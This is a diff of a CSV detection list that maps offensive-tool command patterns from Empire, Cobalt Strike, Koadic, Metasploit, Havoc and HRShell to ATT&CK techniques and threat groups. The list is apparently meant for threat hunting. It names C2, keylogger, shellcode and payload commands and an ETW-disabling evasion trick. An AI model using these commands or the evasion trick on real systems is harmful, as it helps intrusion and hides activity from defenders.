framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*set * virus_scanner*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set AutoRunScript multi_console_command -rc /root/*.rc*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*set CertPath data/*","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*set CollectionMethodAll*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set CertPath data/*","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set CollectionMethodAll*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*set havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*set havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*set hosts_stage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*set keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set LFILE /*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Set Listener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*set Listener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*set obfuscate *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set obfuscate *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*set PAYLOAD *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*set pipename *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set PAYLOAD *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*set pipename *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set Profile apt1.profile*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*set shellcode *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*set smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"*set userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 